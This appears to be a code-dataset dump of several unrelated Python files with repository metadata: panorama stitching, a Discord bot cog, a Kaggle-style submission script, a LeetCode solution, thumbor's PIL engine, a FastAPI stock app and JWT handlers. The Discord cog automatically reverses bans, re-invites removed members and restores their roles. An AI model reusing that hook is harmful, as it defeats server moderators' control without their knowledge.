def mergeImages(points_1, points_2, source, reference, transformFunction, mask = None):
print "Processing..... Please, wait."
T = transformFunction(points_1,points_2)
merged_image = merge(source,reference,T,mask)
return merged_image
#================================================================================
def runPanoramaPlane(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama = imageio.readImageFloat(file_names[0])
for file_name in file_names[1:]:
new_image = imageio.readImageFloat(file_name)
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeHomography)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
def runPanoramaCylinder(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama,mask = projectOnCylinder(imageio.readImageFloat(file_names[0]))
for file_name in file_names[1:]:
new_image,new_mask = projectOnCylinder(imageio.readImageFloat(file_name))
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeTranslation,new_mask)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
def runPanoramaCylinderFull(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama,mask = projectOnCylinder(imageio.readImageFloat(file_names[0]))
for file_name in file_names[1:]:
new_image,new_mask = projectOnCylinder(imageio.readImageFloat(file_name))
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeTranslation,new_mask)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
panorama_width = panorama.shape[1]
points_1, points_2 = pointselecter.getPoints(source,reference)
image360 = mergeImages(points_1,points_2,panorama,panorama,transforms.computeTranslation,new_mask)
image360_width = image360.shape[1]
image360 = image360[:,0.25*image360_width:0.25*image360_width+(panorama_width-(2*panorama_width-image360_width))]
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(image360, vmin=0, vmax=1)
plt.show()
def runRectification(image_name):
img = imageio.readImageFloat(image_name)
points = pointselecter.getFourPoints(img)
print "Processing..... Please, wait."
D_W = RESULTING_RECTIFICATION_WIDTH
D_H = RESULTING_RECTIFICATION_HEIGHT
border = RECTIFICATION_BORDER_FRACTION
points_view = np.array([(border*D_W,border*D_H),((1-border)*D_W,border*D_H),((1-border)*D_W,(1-border)*D_H),(border*D_W,(1-border)*D_H)])
H = transforms.computeHomography(points,points_view)
pts_x, pts_y = zip(*points)
result_image = 0*np.ones((D_H,D_W,3))
fill(img,result_image,H)
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(result_image, vmin=0, vmax=1)
plt.show()
#================================================================================
# Runs the application!
if __name__ == '__main__':
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
print ">> University of California, Berkeley"
print ">> CS194-26 (CS294-26): Computational Photography"
print "==============================================="
print "==============================================="
print ">> Project 7a: Image Warping and Mosaicing - Homographies"
print ">> Student: Ian Albuquerque Raymundo da Silva"
print ">> Email: ian.albuquerque@berkeley.edu"
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
option = raw_input("Choose an option:\n0 = Rectification\n1 = Planar Projection\n2 = Cylindrical Projection\n3 = 360 Planorama\nWrite Option Here: >> ")
if option == "0":
runRectification(RECTIFICATION_FILE_NAME)
elif option == "1":
runPanoramaPlane(PLANAR_PANORAMA_FOLDER)
elif option == "2":
runPanoramaCylinder(CYLINDRICAL_PANORAMA_FOLDER)
elif option == "3":
runPanoramaCylinderFull(PANORAMA_360_FOLDER)
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
print ">> Have a good day!"
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
| [
"ian.albuquerque.silva@gmail.com"
] | ian.albuquerque.silva@gmail.com |
913b6d6712f12af4cd52f808555df65736a46b39 | b56c79690ea0d211b2a09c752620cb3b573d5920 | /ext/events.py | 67e034a77cdd979957493abc14ea1fd789a449f8 | [] | no_license | N8BMAN/MemeBot | 28b4fc26ed8c854160410a5b3118a50430837aa9 | 929b9eb592d262476d1d36686e69f40ff89285bb | refs/heads/master | 2020-03-22T06:58:12.131883 | 2019-12-16T20:25:05 | 2019-12-16T20:25:05 | 139,669,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | import discord, asyncio
from discord.ext import commands
class Events(commands.Cog):
def __init__(self, meme):
self.meme = meme
self.recentBans = []
@commands.Cog.listener()
async def on_member_remove(self, member):
try:
invite = await member.guild.system_channel.create_invite(max_uses=1)
if not member.dm_channel:
await member.create_dm()
channel = member.dm_channel
await channel.send(invite)
self.recentBans.append(member)
except Exception as e:
print(f"Couldn't send invite to {member.name}: {e}")
@commands.Cog.listener()
async def on_member_ban(self, guild, member):
await guild.unban(member)
@commands.Cog.listener()
async def on_member_join(self, member):
if member in self.recentBans:
await member.add_roles(self.recentBans[self.recentBans.index(member)].top_role)
self.recentBans.remove(member)
def setup(meme):
meme.add_cog(Events(meme)) | [
"nate.bowman125@gmail.com"
] | nate.bowman125@gmail.com |
a07caa95edb7398b9588e8dbf134ba5d00978be0 | 977073b97242b8bf48b49e145395d8d948890924 | /experiments/run_submission.py | 0aaa1722561252ba0e1393e56e7ad046f830a6f5 | [] | no_license | upura/booking-challenge-2021 | c80e88f8545ae1b5b8e3d9da3bac49f3ea982ee5 | 7b6daa2fabd28773cc452cd6605861372ea64d78 | refs/heads/master | 2023-03-03T16:22:45.258906 | 2021-02-17T20:36:06 | 2021-02-17T20:36:06 | 325,207,679 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,768 | py | import gc
import numpy as np
import pandas as pd
from sklearn import preprocessing
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from src.datasets import load_train_test, BookingDataset
from src.models import BookingNN
from src.utils import seed_everything
from src.runner import CustomRunner
if __name__ == '__main__':
seed_everything(0)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)
categorical_cols = [
'user_id',
# 'device_class',
# 'affiliate_id',
'booker_country',
# 'hotel_country'
]
train_test = load_train_test()
cat_dims = [int(train_test[col].nunique()) for col in categorical_cols]
emb_dims = [(x, min(50, (x + 1) // 2)) for x in cat_dims]
target_le = preprocessing.LabelEncoder()
train_test['city_id'] = target_le.fit_transform(train_test['city_id'])
for c in categorical_cols:
le = preprocessing.LabelEncoder()
train_test[c] = le.fit_transform(train_test[c].astype(str).fillna('unk').values)
test = train_test[~train_test['row_num'].isnull()]
test_trips = test[test['city_id'] != test['city_id'].shift(1)].query('city_id!=0').groupby('utrip_id')['city_id'].apply(lambda x: x.values).reset_index()
X_test = test[test['city_id'] != test['city_id'].shift(1)].query('city_id!=0').groupby('utrip_id')[categorical_cols].last().reset_index()
X_test['city_id'] = test_trips['city_id']
X_test = X_test.reset_index(drop=True)
test_dataset = BookingDataset(X_test, is_train=False)
test_loader = DataLoader(test_dataset,
shuffle=False,
batch_size=1)
del train_test, test, test_trips
gc.collect()
model_paths = [
'../input/booking-bi-lstm-ep1/logdir_nn000',
]
for mp in model_paths:
for fold_id in (0,):
runner = CustomRunner(device=device)
model = BookingNN(len(target_le.classes_))
pred = []
for prediction in tqdm(runner.predict_loader(loader=test_loader,
resume=f'{mp}/fold{fold_id}/checkpoints/best.pth',
model=model,)):
pred.append(target_le.inverse_transform(np.argsort(prediction.cpu().numpy()[-1, :])[-4:]))
pred = np.array(pred)
np.save(f"y_pred{mp.replace('/', '_').replace('.', '')}_fold{fold_id}", pred)
submission = pd.concat([
X_test['utrip_id'],
pd.DataFrame(pred, columns=['city_id_1', 'city_id_2', 'city_id_3', 'city_id_4'])
], axis=1)
print(submission.head())
submission.to_csv('submission.csv', index=False)
| [
"upura0@gmail.com"
] | upura0@gmail.com |
263f9d74b0c56b54ae61b705fc78e35537aa37aa | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code394DecodeString.py | 6498e6f8c2f6d46d2cadc4e51089b069f52ef7bd | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,120 | py | """
394 Decode String
Given an encoded string, return it's decoded string.
The encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.
You may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.
Furthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].
Examples:
s = "3[a]2[bc]", return "aaabcbc".
s = "3[a2[c]]", return "accaccacc".
s = "2[abc]3[cd]ef", return "abcabccdcdcdef".
"""
class Solution:
# OJ's best
def decodeString(self, s):
stack = []; curNum = 0; curString = ''
for c in s:
if c == '[':
stack.append(curString)
stack.append(curNum)
curString = ''
curNum = 0
elif c == ']':
num = stack.pop()
prevString = stack.pop()
curString = prevString + num*curString
elif c.isdigit():
curNum = curNum*10 + int(c)
else:
curString += c
return curString
# my solution
def decodeString2(self, s):
"""
:type s: str
:rtype: str
"""
stack, num = [''], 0
for c in s:
if c.isdigit():
num = num*10 + ord(c) - ord('0')
elif c == '[':
stack.append(num)
stack.append('')
num = 0
elif c == ']':
sub = stack.pop()
count = stack.pop()
stack[-1] += sub*count
num = 0
else:
stack[-1] += c
num = 0
return stack[-1]
obj = Solution()
test_cases = ['', 'abcde', '3[a]2[bc]', '3[a2[c]]', '2[abc]3[cd]ef']
for case in test_cases:
print(obj.decodeString(case)) | [
"guoligit@gmail.com"
] | guoligit@gmail.com |
8202094a23d76e36f8d0a8c3817a8c188a349efa | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/lib/python3.7/site-packages/thumbor/engines/pil.py | 74b45e391dd24609f25b3067ab5ceab52c495cf8 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,327 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
from __future__ import absolute_import
import os
from tempfile import mkstemp
from subprocess import Popen, PIPE
from io import BytesIO
from PIL import Image, ImageFile, ImageDraw, ImageSequence, JpegImagePlugin, ImageFilter
from thumbor.engines import BaseEngine
from thumbor.engines.extensions.pil import GifWriter
from thumbor.utils import logger, deprecated
try:
from thumbor.ext.filters import _composite
FILTERS_AVAILABLE = True
except ImportError:
FILTERS_AVAILABLE = False
FORMATS = {
'.tif': 'PNG', # serve tif as png
'.jpg': 'JPEG',
'.jpeg': 'JPEG',
'.gif': 'GIF',
'.png': 'PNG',
'.webp': 'WEBP'
}
ImageFile.MAXBLOCK = 2 ** 25
ImageFile.LOAD_TRUNCATED_IMAGES = True
DecompressionBombExceptions = (Image.DecompressionBombWarning,)
if hasattr(Image, 'DecompressionBombError'):
DecompressionBombExceptions += (Image.DecompressionBombError,)
class Engine(BaseEngine):
    """Thumbor imaging engine backed by PIL/Pillow.

    Captures JPEG encoder state (subsampling, quantization tables) from the
    source image so it can be reproduced when saving, and honors the
    context configuration for resizing, animated GIFs and output formats.
    """

    def __init__(self, context):
        super(Engine, self).__init__(context)
        # JPEG encoder state read from the source image in create_image()
        # and re-applied in read() when the config asks to keep it.
        self.subsampling = None
        self.qtables = None
        self.original_mode = None
        try:
            if self.context.config.MAX_PIXELS is None or int(self.context.config.MAX_PIXELS):
                Image.MAX_IMAGE_PIXELS = self.context.config.MAX_PIXELS
        except (AttributeError, TypeError, ValueError):  # invalid type
            # Fixed typo in the log message ("int on None" -> "int or None").
            logger.info('MAX_PIXELS config variable set to invalid type. Has to be int or None')

    def gen_image(self, size, color):
        """Create a new RGBA image of *size* filled with *color*.

        'transparent' maps to Pillow's default (fully transparent) fill.
        """
        if color == 'transparent':
            color = None
        img = Image.new("RGBA", size, color)
        return img

    def create_image(self, buffer):
        """Decode *buffer* into a PIL image (or a list of frames for GIFs).

        Returns None when the image trips Pillow's decompression-bomb guard.
        Side effects: records icc profile, exif, original mode, subsampling
        and quantization tables for later use in read().
        """
        try:
            img = Image.open(BytesIO(buffer))
        except DecompressionBombExceptions as e:
            logger.warning("[PILEngine] create_image failed: {0}".format(e))
            return None
        self.icc_profile = img.info.get('icc_profile')
        self.exif = img.info.get('exif')
        self.original_mode = img.mode
        self.subsampling = JpegImagePlugin.get_sampling(img)
        if (self.subsampling == -1):  # n/a for this file
            self.subsampling = None
        self.qtables = getattr(img, 'quantization', None)
        if self.context.config.ALLOW_ANIMATED_GIFS and self.extension == '.gif':
            frames = []
            for frame in ImageSequence.Iterator(img):
                frames.append(frame.convert('P'))
            img.seek(0)
            self.frame_count = len(frames)
            return frames
        return img

    def get_resize_filter(self):
        """Return the Pillow resampling filter selected by configuration.

        Unknown names fall back to LANCZOS; HAMMING is only offered when
        the installed Pillow provides it.
        """
        config = self.context.config
        resample = config.PILLOW_RESAMPLING_FILTER if config.PILLOW_RESAMPLING_FILTER is not None else 'LANCZOS'
        available = {
            'LANCZOS': Image.LANCZOS,
            'NEAREST': Image.NEAREST,
            'BILINEAR': Image.BILINEAR,
            'BICUBIC': Image.BICUBIC,
        }
        if hasattr(Image, 'HAMMING'):
            available['HAMMING'] = Image.HAMMING
        return available.get(resample.upper(), Image.LANCZOS)

    def draw_rectangle(self, x, y, width, height):
        """Draw an unfilled rectangle outline onto the current image."""
        # Nasty retry if the image is loaded for the first time and it's truncated
        try:
            d = ImageDraw.Draw(self.image)
        except IOError:
            d = ImageDraw.Draw(self.image)
        d.rectangle([x, y, x + width, y + height])
        del d

    def resize(self, width, height):
        """Resize the current image to (width, height) using the configured filter."""
        # Indexed color modes (such as 1 and P) will be forced to use a
        # nearest neighbor resampling algorithm. So we convert them to
        # RGB(A) mode before resizing to avoid nasty scaling artifacts.
        if self.image.mode in ['1', 'P']:
            logger.debug('converting image from 8-bit/1-bit palette to 32-bit RGB(A) for resize')
            if self.image.mode == '1':
                target_mode = 'RGB'
            else:
                # convert() figures out RGB or RGBA based on palette used
                target_mode = None
            self.image = self.image.convert(mode=target_mode)
        size = (int(width), int(height))
        # Tell image loader what target size we want (only JPG for a moment)
        self.image.draft(None, size)
        resample = self.get_resize_filter()
        self.image = self.image.resize(size, resample)

    def crop(self, left, top, right, bottom):
        """Crop the current image to the given bounding box (coerced to int)."""
        self.image = self.image.crop((
            int(left),
            int(top),
            int(right),
            int(bottom)
        ))

    def rotate(self, degrees):
        """Rotate the image by *degrees* (PIL rotates counter clockwise).

        The 90/180/270 cases use lossless transpose; anything else expands
        the canvas to fit.
        """
        if degrees == 90:
            self.image = self.image.transpose(Image.ROTATE_90)
        elif degrees == 180:
            self.image = self.image.transpose(Image.ROTATE_180)
        elif degrees == 270:
            self.image = self.image.transpose(Image.ROTATE_270)
        else:
            self.image = self.image.rotate(degrees, expand=1)

    def flip_vertically(self):
        """Mirror the image top-to-bottom."""
        self.image = self.image.transpose(Image.FLIP_TOP_BOTTOM)

    def flip_horizontally(self):
        """Mirror the image left-to-right."""
        self.image = self.image.transpose(Image.FLIP_LEFT_RIGHT)

    def get_default_extension(self):
        """Pick an output extension when none was requested.

        Modes that can carry transparency/palette go to PNG, else JPEG.
        """
        # extension is not present => force JPEG or PNG
        if self.image.mode in ['P', 'RGBA', 'LA']:
            return '.png'
        else:
            return '.jpeg'

    def read(self, extension=None, quality=None):  # NOQA
        """Serialize the current image and return the encoded bytes.

        Applies format-specific options (JPEG optimize/progressive/
        subsampling/qtables, PNG compression level, WebP lossless) and
        preserves ICC/EXIF metadata when configured to do so.
        """
        # returns image buffer in byte format.
        img_buffer = BytesIO()
        requested_extension = extension or self.extension
        # 1 and P mode images will be much smaller if converted back to
        # their original mode. So let's do that after resizing. Get $$.
        if self.context.config.PILLOW_PRESERVE_INDEXED_MODE and requested_extension in [None, '.png', '.gif'] \
                and self.original_mode in ['P', '1'] and self.original_mode != self.image.mode:
            if self.original_mode == '1':
                self.image = self.image.convert('1')
            else:
                # libimagequant might not be enabled on compile time
                # but it's better than default octree for RGBA images, so worth a try
                quantize_default = True
                try:
                    # Option available since Pillow 3.3.0
                    if hasattr(Image, 'LIBIMAGEQUANT'):
                        self.image = self.image.quantize(method=Image.LIBIMAGEQUANT)
                        quantize_default = False
                except ValueError as ex:
                    if 'dependency' not in str(ex).lower():
                        raise
                if quantize_default:
                    self.image = self.image.quantize()
        ext = requested_extension or self.get_default_extension()
        options = {
            'quality': quality
        }
        if ext == '.jpg' or ext == '.jpeg':
            options['optimize'] = True
            if self.context.config.PROGRESSIVE_JPEG:
                # Can't simply set options['progressive'] to the value
                # of self.context.config.PROGRESSIVE_JPEG because save
                # operates on the presence of the key in **options, not
                # the value of that setting.
                options['progressive'] = True
            if self.image.mode != 'RGB':
                self.image = self.image.convert('RGB')
            else:
                subsampling_config = self.context.config.PILLOW_JPEG_SUBSAMPLING
                qtables_config = self.context.config.PILLOW_JPEG_QTABLES
                if subsampling_config is not None or qtables_config is not None:
                    options['quality'] = 0  # can't use 'keep' here as Pillow would try to extract qtables/subsampling and fail
                    orig_subsampling = self.subsampling
                    orig_qtables = self.qtables
                    if (subsampling_config == 'keep' or subsampling_config is None) and (orig_subsampling is not None):
                        options['subsampling'] = orig_subsampling
                    else:
                        options['subsampling'] = subsampling_config
                    if (qtables_config == 'keep' or qtables_config is None) and (orig_qtables and 2 <= len(orig_qtables) <= 4):
                        options['qtables'] = orig_qtables
                    else:
                        options['qtables'] = qtables_config
        if ext == '.png' and self.context.config.PNG_COMPRESSION_LEVEL is not None:
            options['compress_level'] = self.context.config.PNG_COMPRESSION_LEVEL
        if options['quality'] is None:
            options['quality'] = self.context.config.QUALITY
        if self.icc_profile is not None:
            options['icc_profile'] = self.icc_profile
        if self.context.config.PRESERVE_EXIF_INFO:
            if self.exif is not None:
                options['exif'] = self.exif
        try:
            if ext == '.webp':
                if options['quality'] == 100:
                    logger.debug("webp quality is 100, using lossless instead")
                    options['lossless'] = True
                    options.pop('quality')
                if self.image.mode not in ['RGB', 'RGBA']:
                    if self.image.mode == 'P':
                        mode = 'RGBA'
                    else:
                        mode = 'RGBA' if self.image.mode[-1] == 'A' else 'RGB'
                    self.image = self.image.convert(mode)
            if ext in ['.png', '.gif'] and self.image.mode == 'CMYK':
                self.image = self.image.convert('RGBA')
            self.image.format = FORMATS.get(ext, FORMATS[self.get_default_extension()])
            self.image.save(img_buffer, self.image.format, **options)
        except IOError:
            logger.exception('Could not save as improved image, consider to increase ImageFile.MAXBLOCK')
            self.image.save(img_buffer, FORMATS[ext])
        results = img_buffer.getvalue()
        img_buffer.close()
        self.extension = ext
        return results

    def read_multiple(self, images, extension=None):
        """Encode a list of frames as an animated GIF, optimized via gifsicle.

        Falls back to the unoptimized bytes when gifsicle exits non-zero.
        """
        gif_writer = GifWriter()
        img_buffer = BytesIO()
        duration = []
        converted_images = []
        xy = []
        dispose = []
        for im in images:
            # GIF durations are stored in ms; GifWriter wants seconds.
            duration.append(float(im.info.get('duration', 80)) / 1000)
            converted_images.append(im.convert("RGB"))
            xy.append((0, 0))
            dispose.append(1)
        loop = int(self.image.info.get('loop', 1))
        images = gif_writer.convertImagesToPIL(converted_images, False, None)
        gif_writer.writeGifToFile(img_buffer, images, duration, loop, xy, dispose)
        results = img_buffer.getvalue()
        img_buffer.close()
        tmp_fd, tmp_file_path = mkstemp()
        # FIX: results is bytes, so the temp file must be opened in binary
        # mode ("w" raises TypeError on Python 3).
        f = os.fdopen(tmp_fd, "wb")
        f.write(results)
        f.close()
        command = [
            'gifsicle',
            '--colors',
            '256',
            tmp_file_path
        ]
        popen = Popen(command, stdout=PIPE)
        pipe = popen.stdout
        pipe_output = pipe.read()
        pipe.close()
        if popen.wait() == 0:
            results = pipe_output
        os.remove(tmp_file_path)
        return results

    @deprecated("Use image_data_as_rgb instead.")
    def get_image_data(self):
        """Return the raw pixel bytes of the current image."""
        return self.image.tobytes()

    def set_image_data(self, data):
        """Replace the current image's pixel bytes in place (mode/size unchanged)."""
        self.image.frombytes(data)

    @deprecated("Use image_data_as_rgb instead.")
    def get_image_mode(self):
        """Return the current PIL mode string (e.g. 'RGB', 'P')."""
        return self.image.mode

    def image_data_as_rgb(self, update_image=True):
        """Return (mode, pixel_bytes) with the image coerced to RGB or RGBA."""
        converted_image = self.image
        if converted_image.mode not in ['RGB', 'RGBA']:
            if 'A' in converted_image.mode:
                converted_image = converted_image.convert('RGBA')
            elif converted_image.mode == 'P':
                # convert() figures out RGB or RGBA based on palette used
                converted_image = converted_image.convert(None)
            else:
                converted_image = converted_image.convert('RGB')
        if update_image:
            self.image = converted_image
        return converted_image.mode, converted_image.tobytes()

    def convert_to_grayscale(self, update_image=True, with_alpha=True):
        """Convert to grayscale, keeping the alpha channel when present and requested."""
        if 'A' in self.image.mode and with_alpha:
            image = self.image.convert('LA')
        else:
            image = self.image.convert('L')
        if update_image:
            self.image = image
        return image

    def has_transparency(self):
        """Return True when the image actually contains non-opaque pixels."""
        has_transparency = 'A' in self.image.mode or 'transparency' in self.image.info
        if has_transparency:
            # If the image has alpha channel,
            # we check for any pixels that are not opaque (255)
            has_transparency = min(self.image.convert('RGBA').getchannel('A').getextrema()) < 255
        return has_transparency

    def paste(self, other_engine, pos, merge=True):
        """Paste another engine's image at *pos*, alpha-compositing when *merge*.

        Merge requires thumbor's compiled filters (_composite).
        """
        if merge and not FILTERS_AVAILABLE:
            raise RuntimeError(
                'You need filters enabled to use paste with merge. Please reinstall ' +
                'thumbor with proper compilation of its filters.')
        self.enable_alpha()
        other_engine.enable_alpha()
        image = self.image
        other_image = other_engine.image
        if merge:
            sz = self.size
            other_size = other_engine.size
            mode, data = self.image_data_as_rgb()
            other_mode, other_data = other_engine.image_data_as_rgb()
            imgdata = _composite.apply(
                mode, data, sz[0], sz[1],
                other_data, other_size[0], other_size[1], pos[0], pos[1])
            self.set_image_data(imgdata)
        else:
            image.paste(other_image, pos)

    def enable_alpha(self):
        """Ensure the image has an alpha channel (convert to RGBA if needed)."""
        if self.image.mode != 'RGBA':
            self.image = self.image.convert('RGBA')

    def strip_icc(self):
        """Drop the stored ICC profile so it is not written on save."""
        self.icc_profile = None

    def strip_exif(self):
        """Drop the stored EXIF blob so it is not written on save."""
        self.exif = None

    def blur(self, radius):
        """Apply a Gaussian blur with the given radius."""
        self.image = self.image.filter(ImageFilter.GaussianBlur(radius))
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ebb61313229105bb7b4920c03da8492cdfb76579 | 2adf2ddb53b6e132f98454f268a876c1bbd5aafe | /main.py | d6a3ca6df3fd97dc3992ede09475d727e1ecc945 | [] | no_license | francoislegac/stockscreen_api | 9b296c81b85c09877d789d502dfa93ab79797466 | 33cc8410f82b3e6b33864eb1a8fa381836defefd | refs/heads/main | 2023-08-16T15:09:22.464594 | 2021-10-01T21:24:28 | 2021-10-01T21:24:28 | 412,618,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,701 | py | import models
import yfinance
from fastapi import FastAPI, Request, Depends, BackgroundTasks
from fastapi.templating import Jinja2Templates
from sqlalchemy.orm import Session
from database import SessionLocal, engine
from pydantic import BaseModel
from models import Stock
app = FastAPI()
models.Base.metadata.create_all(bind=engine)
#where are the html templates
templates = Jinja2Templates(directory= 'templates')
class StockRequest(BaseModel):
    """Request body for POST /stock: the ticker symbol to track."""
    symbol: str
def get_db():
    """FastAPI dependency yielding a database session that is always closed.

    The session is created *before* the try block: in the original code a
    failure inside SessionLocal() left ``db`` unbound, so the ``finally``
    clause raised an unrelated NameError that masked the real error.
    """
    db = SessionLocal()
    try:
        yield db
    finally:
        db.close()
@app.get('/')
def home(request: Request):
    """Render the stock screener dashboard (homepage)."""
    context = {'request': request}
    return templates.TemplateResponse('home.html', context)
#get the data from finance mag
def fetch_stock_data(id: int):
    """Background task: pull quote data from Yahoo Finance for the stock row
    with primary key *id* and persist it.

    Runs outside the request/response cycle, so it opens its own session;
    the original version never closed it, leaking a DB connection per task.
    """
    db = SessionLocal()
    try:
        stock = db.query(Stock).filter(Stock.id == id).first()
        yahoo_data = yfinance.Ticker(stock.symbol)
        stock.ma200 = yahoo_data.info['twoHundredDayAverage']
        stock.ma50 = yahoo_data.info['fiftyDayAverage']
        stock.price = yahoo_data.info['previousClose']
        stock.forward_pe = yahoo_data.info['forwardPE']
        stock.forward_eps = yahoo_data.info['forwardEps']
        if yahoo_data.info['dividendYield'] is not None:
            stock.dividend_yield = yahoo_data.info['dividendYield'] * 100
        db.add(stock)
        db.commit()
    finally:
        db.close()  # always release the connection, even if yfinance fails
@app.post('/stock')
async def create_stock(stock_request: StockRequest, background_tasks: BackgroundTasks, db: Session = Depends(get_db)):
    """
    create a stock and stores it into the database
    """
    # Persist the bare symbol first so the endpoint responds immediately;
    # prices/averages are filled in asynchronously by the background task.
    stock = Stock()
    stock.symbol = stock_request.symbol
    db.add(stock)
    db.commit()
    # commit() populated stock.id, which the task uses to reload the row.
    background_tasks.add_task(fetch_stock_data, stock.id)
    return {
        'code':'success',
        'message':'stock created'
    }
"francois.legac59@gmail.com"
] | francois.legac59@gmail.com |
da2627d7cd45f5e9f9e893251f0842877f0ea20f | a1de4ef95569bf74190c16063049c63365926cea | /backend/tests/test_run_adapters.py | 832e83285bed9f5d9d29c198df64db04ed5f00c2 | [] | no_license | jigsawlabs-student/hotels_project | e1c773a6cc263c3b7cdcf141829627a2352c2144 | ed30521941bc0a95b8f139b3efd942ed18c0a6d6 | refs/heads/main | 2023-03-04T13:15:35.878281 | 2021-02-19T21:24:06 | 2021-02-19T21:24:06 | 340,493,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | import os
import pytest
from run_adapters import hotel_ids_str
# Production Test - Tests the CSV of hotels to call from the API is properly opened and the Amadeus ID's are converted to a string to prepare for API call
# If add more hotels than Aman, update the hotel_ids str below:
hotel_ids = 'AMATHAAZ,AMBJVARU,AMCMBAAW,AMCMBAMA,AMCVFAAL,AMDPSAKA,AMDPSAMI,AMHGHAFA,AMHKTAMP,AMJACAMG,AMJAIAAK,AMJAIAMA,AMJOGABA,AMLJGAMA,AMLPQAAT,AMMNLAMP,AMNGOAMA,AMNHAAOI,AMPEKASP,AMPGAAGI,AMPLSAAY,AMPOPAME,AMQBAAAS,AMRAKTAH,AMREPASA,AMSHAAMN,AMSWQAWA,AMTYOATK,AMVCECGV,AMDPSASN,AMUKYANK'
def test_hotel_ids_prod():
    """Verify hotel_ids_str() joins the CSV's Amadeus IDs into the expected string."""
    hotel_id_str = hotel_ids_str()
    assert hotel_id_str == hotel_ids
### NEEDS TO BE FIXED WITH OS.PATH.JOIN | [
"cwaskom@gmail.com"
] | cwaskom@gmail.com |
2542635ffe3127c2fbac935e327705fd7fcb674b | cc7bbdbb22cb6f7e7916388a5ee8218bc8ffa158 | /Python3/Tornado/apps/pg/PG_Client/clientadmin/utils.py | 971af7cb5a0d2998e2e927d20769b4a5cd027213 | [
"MIT"
] | permissive | youngqqcn/QBlockChainNotes | a816e067642f48a6da38b624663254b4016ec496 | c9c143eaba6c06e3cee866669ec286e4d3cdbba8 | refs/heads/master | 2023-04-03T23:31:05.585545 | 2023-03-30T09:29:07 | 2023-03-30T09:29:07 | 155,657,459 | 37 | 15 | MIT | 2023-03-06T23:09:32 | 2018-11-01T03:33:11 | JavaScript | UTF-8 | Python | false | false | 1,574 | py |
def jwt_response_payload_handler(token, user=None, request=None):
    """Build the response payload for a successful JWT authentication.

    :param token: the issued JWT
    :param user: the authenticated user object
    :param request: the current client request
    When ``user.username`` is set the account still requires a (Google)
    verification code, so the client is asked to re-login with the code
    instead of receiving the token.
    """
    # Idiom fix: identity comparison with None uses `is not`, not `!=`.
    if user.username is not None:
        return {
            'code': "fail",
            "status": 200,
            "data": {
                "gcode" : user.username,
                "detail": "请输入验证码,重新登录!",
            }
        }
    return {
        'code': "success",
        "status": 200,
        "data": {
            'token': token,
            'pro_id': user.pro_id,
            'username': user.pro_name,
            'email': user.email,
            'tel_no': user.tel_no,
            "detail": "登录成功!",
        }
    }
def jwt_response_payload_error_handler(request=None):
    """Payload returned when credential authentication fails."""
    data = {
        "detail": "登录失败! 请检查账号信息是否正确,重新登录! ",
    }
    return {"code": "fail", "status": 400, "data": data}
def jwt_response_payload_code_error_handler(request=None):
    """Payload returned when the Google verification code is wrong."""
    data = {
        "detail": "登录失败! 请检查谷歌验证码是否正确,重新登录! ",
    }
    return {"code": "fail", "status": 400, "data": data}
def jwt_response_payload_frequently_error_handler(request=None):
    """Payload returned when logins are attempted too frequently."""
    data = {
        "detail": "登录失败! 登录频繁! ",
    }
    return {"code": "fail", "status": 400, "data": data}
| [
"youngqqcn@163.com"
] | youngqqcn@163.com |
